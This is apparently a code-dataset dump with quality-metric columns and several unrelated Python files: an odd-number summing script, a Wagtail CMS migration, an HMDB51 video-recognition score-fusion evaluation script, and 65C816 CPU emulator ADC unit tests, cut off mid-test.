hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b6b31e8256a11d3ae22f7859c3d2127f0a7ba4e7
| 588
|
py
|
Python
|
add-ten-odd-numbers.py
|
Omi0604/DCU-Einstein-
|
b35e2657b8e27904035e881021c9bdf9e51675bb
|
[
"MIT"
] | null | null | null |
add-ten-odd-numbers.py
|
Omi0604/DCU-Einstein-
|
b35e2657b8e27904035e881021c9bdf9e51675bb
|
[
"MIT"
] | null | null | null |
add-ten-odd-numbers.py
|
Omi0604/DCU-Einstein-
|
b35e2657b8e27904035e881021c9bdf9e51675bb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
total = 0
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
print(total)
| 12.782609
| 22
| 0.462585
| 108
| 588
| 2.518519
| 0.101852
| 0.213235
| 0.330882
| 0.367647
| 0.882353
| 0.882353
| 0.882353
| 0.882353
| 0.882353
| 0.882353
| 0
| 0.028571
| 0.285714
| 588
| 45
| 23
| 13.066667
| 0.619048
| 0.035714
| 0
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.03125
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fcc53c557e0c8d42430fc3705bf5595b5e329f24
| 7,083
|
py
|
Python
|
cfgov/ask_cfpb/migrations/0015_update_email_signup_options.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 1
|
2019-11-26T20:18:22.000Z
|
2019-11-26T20:18:22.000Z
|
cfgov/ask_cfpb/migrations/0015_update_email_signup_options.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 8
|
2021-03-11T00:55:51.000Z
|
2022-02-13T21:10:14.000Z
|
cfgov/ask_cfpb/migrations/0015_update_email_signup_options.py
|
higs4281/cfgov-refresh
|
a02b193fb2373d443265c21845adf8a196e05675
|
[
"CC0-1.0"
] | 1
|
2019-12-28T14:04:07.000Z
|
2019-12-28T14:04:07.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import wagtail.wagtailcore.fields
import wagtail.wagtailsnippets.blocks
import v1.blocks
import v1.models.snippets
import wagtail.wagtailcore.blocks
class Migration(migrations.Migration):
dependencies = [
('ask_cfpb', '0014_recreated_2'),
]
operations = [
migrations.AlterField(
model_name='answerpage',
name='sidebar',
field=wagtail.wagtailcore.fields.StreamField([('call_to_action', wagtail.wagtailcore.blocks.StructBlock([(b'slug_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph_text', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'button', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False)), (b'size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[(b'regular', b'Regular'), (b'large', b'Large Primary')]))]))])), ('related_links', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))])), ('related_metadata', wagtail.wagtailcore.blocks.StructBlock([(b'slug', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'content', wagtail.wagtailcore.blocks.StreamBlock([(b'text', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'blob', wagtail.wagtailcore.blocks.RichTextBlock())], icon=b'pilcrow')), (b'list', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))], icon=b'list-ul')), (b'date', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'date', wagtail.wagtailcore.blocks.DateBlock())], icon=b'date')), (b'topics', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(default=b'Topics', max_length=100)), (b'show_topics', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False))], icon=b'tag'))])), (b'is_half_width', wagtail.wagtailcore.blocks.BooleanBlock(default=False, required=False))])), ('email_signup', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'default_heading', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If selected, heading will be styled as an H5 with green top rule. Deselect to style header as H3.', default=True, required=False, label=b'Default heading style')), (b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'gd_code', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'form_field', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'btn_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'required', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'info', wagtail.wagtailcore.blocks.RichTextBlock(required=False, label=b'Disclaimer')), (b'inline_info', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Show disclaimer on same line as button. Only select this option if the disclaimer text is a few words (ie, "Privacy Act statement") rather than a full sentence.', required=False, label=b'Inline disclaimer')), (b'label', wagtail.wagtailcore.blocks.CharBlock(required=True)), (b'type', wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'text', b'Text'), (b'checkbox', b'Checkbox'), (b'email', b'Email'), (b'number', b'Number'), (b'url', b'URL'), (b'radio', b'Radio')])), (b'placeholder', wagtail.wagtailcore.blocks.CharBlock(required=False))]), required=False, icon=b'mail'))])), ('sidebar_contact', wagtail.wagtailcore.blocks.StructBlock([(b'contact', wagtail.wagtailsnippets.blocks.SnippetChooserBlock(b'v1.Contact')), (b'has_top_rule_line', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Add a horizontal rule line to top of contact block.', default=False, required=False))])), ('rss_feed', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[(b'blog_feed', b'Blog Feed'), (b'newsroom_feed', b'Newsroom Feed')])), ('social_media', wagtail.wagtailcore.blocks.StructBlock([(b'is_share_view', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If unchecked, social media icons will link users to official CFPB accounts. Do not fill in any further fields.', default=True, required=False, label=b'Desired action: share this page')), (b'blurb', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Sets the tweet text, email subject line, and LinkedIn post text.', default=b"Look what I found on the CFPB's site!", required=False)), (b'twitter_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for Twitter shares. If blank, will default to value of blurb field above.', max_length=100, required=False)), (b'twitter_related', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) A comma-separated list of accounts related to the content of the shared URL. Do not enter the @ symbol. If blank, it will default to just "cfpb".', required=False)), (b'twitter_hashtags', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) A comma-separated list of hashtags to be appended to default tweet text.', required=False)), (b'twitter_lang', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Loads text components in the specified language, if other than English. E.g., use "es" for Spanish. See https://dev.twitter.com/web/overview/languages for a list of supported language codes.', required=False)), (b'email_title', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom subject for email shares. If blank, will default to value of blurb field above.', required=False)), (b'email_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for email shares. If blank, will default to "Check out this page from the CFPB".', required=False)), (b'email_signature', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Adds a custom signature line to email shares. ', required=False)), (b'linkedin_title', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom title for LinkedIn shares. If blank, will default to value of blurb field above.', required=False)), (b'linkedin_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for LinkedIn shares.', required=False))])), ('reusable_text', v1.blocks.ReusableTextChooserBlock(v1.models.snippets.ReusableText))], blank=True),
),
]
| 283.32
| 6,583
| 0.770295
| 955
| 7,083
| 5.646073
| 0.231414
| 0.216988
| 0.280415
| 0.177485
| 0.563056
| 0.519102
| 0.457901
| 0.405972
| 0.331973
| 0.309533
| 0
| 0.004726
| 0.073839
| 7,083
| 24
| 6,584
| 295.125
| 0.817226
| 0.002965
| 0
| 0
| 0
| 0.5
| 0.323371
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.388889
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fce8cf685129513bc5965c7454d43284cebad81d
| 5,756
|
py
|
Python
|
eval_hmdb.py
|
Ewenwan/DTPP
|
0a10dd8c61596d5326fbbe70dcac0eae59088c27
|
[
"BSD-2-Clause"
] | 1
|
2019-05-07T01:00:18.000Z
|
2019-05-07T01:00:18.000Z
|
eval_hmdb.py
|
Ewenwan/DTPP
|
0a10dd8c61596d5326fbbe70dcac0eae59088c27
|
[
"BSD-2-Clause"
] | null | null | null |
eval_hmdb.py
|
Ewenwan/DTPP
|
0a10dd8c61596d5326fbbe70dcac0eae59088c27
|
[
"BSD-2-Clause"
] | 1
|
2019-09-18T05:27:50.000Z
|
2019-09-18T05:27:50.000Z
|
import argparse
import sys
import numpy as np
import scipy.io as sio
from pyActionRecog.utils.video_funcs import default_aggregation_func
from pyActionRecog.utils.metrics import mean_class_accuracy, class_accuracy
def get_score(score_files, xxxx = 0.4):
crop_agg = "mean"
score_npz_files = [np.load(x) for x in score_files]
score_list = [x['scores'][:, 0] for x in score_npz_files]
label_list = [x['labels'] for x in score_npz_files]
agg_score_list = []
for score_vec in score_list:
agg_score_vec = [default_aggregation_func(x, normalization=False, crop_agg=getattr(np, crop_agg)) for x in
score_vec]
agg_score_list.append(np.array(agg_score_vec))
split = score_files[0].split("_")[2]
score_weights = [xxxx, 1.0 - xxxx]
if score_weights is None:
score_weights = [1] * len(score_npz_files)
else:
score_weights = score_weights
if len(score_weights) != len(score_npz_files):
raise ValueError("Only {} weight specifed for a total of {} score files"
.format(len(score_weights), len(score_npz_files)))
final_scores = np.zeros_like(agg_score_list[0])
for i, agg_score in enumerate(agg_score_list):
final_scores += agg_score * score_weights[i]
print "split: ", split
ff = [x[0][0] for x in final_scores]
return ff, label_list[0]
def get_score_11111(score_files, xxxx = 0.4):
crop_agg = "mean"
score_npz_files = [np.load(x) for x in score_files]
score_list = [x['scores'][:, 0] for x in score_npz_files]
label_list = [x['labels'] for x in score_npz_files]
agg_score_list = []
for score_vec in score_list:
agg_score_vec = [default_aggregation_func(x, normalization=False, crop_agg=getattr(np, crop_agg)) for x in
score_vec]
agg_score_list.append(np.array(agg_score_vec))
split = score_files[0].split("_")[2]
score_weights = [xxxx, 1.0 - xxxx]
if score_weights is None:
score_weights = [1] * len(score_npz_files)
else:
score_weights = score_weights
if len(score_weights) != len(score_npz_files):
raise ValueError("Only {} weight specifed for a total of {} score files"
.format(len(score_weights), len(score_npz_files)))
final_scores = np.zeros_like(agg_score_list[0])
for i, agg_score in enumerate(agg_score_list):
final_scores += agg_score * score_weights[i]
print "split: ", split
ff = [x[0][0] for x in final_scores]
acc = mean_class_accuracy(ff, label_list[0])
# print 'Final accuracy {:02f}%'.format(acc * 100)
# print "rgb_score_weight: ", xxxx
# print "\n"
return acc
#
# # score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_new_score.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_new_score.npz'] ### 0.86
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_swing_baseball.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_swing_baseball.npz']
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_draw_sword.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_draw_sword.npz']
score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_cart_wheel.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_cart_wheel.npz']
ff, ll = get_score(score_files)
#
# # score_files = ['hmdb51_split_1_tsn_flow_reference_bn_inception_new_sit.npz', 'hmdb51_split_1_tsn_rgb_reference_bn_inception_new_sit.npz']
# score_files = ['hmdb51_split_1_tsn_rgb_reference_bn_inception_new_swing_baseball.npz', 'hmdb51_split_1_tsn_flow_reference_bn_inception_new_swing_baseball.npz']
# score_files = ['hmdb51_split_1_tsn_rgb_reference_bn_inception_new_draw_sword.npz', 'hmdb51_split_1_tsn_flow_reference_bn_inception_new_draw_sword.npz']
score_files = ['hmdb51_split_1_tsn_flow_reference_bn_inception_new_cart_wheel.npz', 'hmdb51_split_1_tsn_rgb_reference_bn_inception_new_cart_wheel.npz']
ff1, ll = get_score(score_files, xxxx=0.5)
#
acc, iiiii = class_accuracy(ff, ff1, ll)
# print 'Final accuracy {:02f}%'.format(acc * 100)
# print "rgb_score_weight: ", xxxx
# print "\n"
# score_files = ["hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112.npz", "hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672.npz"]
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_swing_baseball.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_swing_baseball.npz']
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_draw_sword.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_draw_sword.npz']
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_cart_wheel.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_cart_wheel.npz']
# acc_1 = get_score_11111(score_files)
# score_files = ["hmdb51_split_1_tsn_rgb_reference_bn_inception_new.npz", "hmdb51_split_1_tsn_flow_reference_bn_inception_new.npz"]
# score_files = ['hmdb51_split_1_tsn_rgb_reference_bn_inception_new_swing_baseball.npz', 'hmdb51_split_1_tsn_flow_reference_bn_inception_new_swing_baseball.npz']
# score_files = ['hmdb51_split_1_tsn_rgb_reference_bn_inception_new_draw_sword.npz', 'hmdb51_split_1_tsn_flow_reference_bn_inception_new_draw_sword.npz']
score_files = ['hmdb51_split_1_tsn_flow_reference_bn_inception_new_cart_wheel.npz', 'hmdb51_split_1_tsn_rgb_reference_bn_inception_new_cart_wheel.npz']
acc_2 = get_score_11111(score_files, xxxx=0.5)
#
# dev = acc_1 - acc_2
#
#
# def rr(nn1):
# res = np.argsort(-nn1)
# seq = nn1[res]
# return res, seq
#
# ax, axx = rr(dev)
#
# print dev
| 50.491228
| 177
| 0.759555
| 943
| 5,756
| 4.112407
| 0.11877
| 0.090768
| 0.09902
| 0.086643
| 0.901496
| 0.894533
| 0.884992
| 0.87442
| 0.869263
| 0.869263
| 0
| 0.058502
| 0.141765
| 5,756
| 114
| 178
| 50.491228
| 0.726518
| 0.417651
| 0
| 0.75
| 0
| 0
| 0.167572
| 0.121075
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.09375
| null | null | 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1e639588e7ad61966318c61bae353a50f286efae
| 119,373
|
py
|
Python
|
test_mpu65c816_native_16.py
|
tmr4/py65_65816
|
9e905ce1dc73463eabe131324a30e242b36765a3
|
[
"BSD-2-Clause"
] | 2
|
2022-01-11T20:10:16.000Z
|
2022-01-12T07:43:50.000Z
|
test_mpu65c816_native_16.py
|
tmr4/py65_65816
|
9e905ce1dc73463eabe131324a30e242b36765a3
|
[
"BSD-2-Clause"
] | null | null | null |
test_mpu65c816_native_16.py
|
tmr4/py65_65816
|
9e905ce1dc73463eabe131324a30e242b36765a3
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
import sys
import devices.mpu65c816
# x tests
class MPUTests(unittest.TestCase):
"""CMOS 65C816 Tests - Native Mode - 16 Bit"""
def test_repr(self):
mpu = self._make_mpu()
self.assertTrue('65C816' in repr(mpu))
# Native Mode - 16 bit
# ADC Absolute
def test_adc_bcd_off_absolute_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0
self.assertEqual(0x30000, len(mpu.memory))
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_absolute_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.p |= mpu.CARRY
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_absolute_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_absolute_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_absolute_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_absolute_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_absolute_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_absolute_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_absolute_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Absolute, X-Indexed
def test_adc_bcd_off_abs_x_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_abs_x_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.x = 0x03
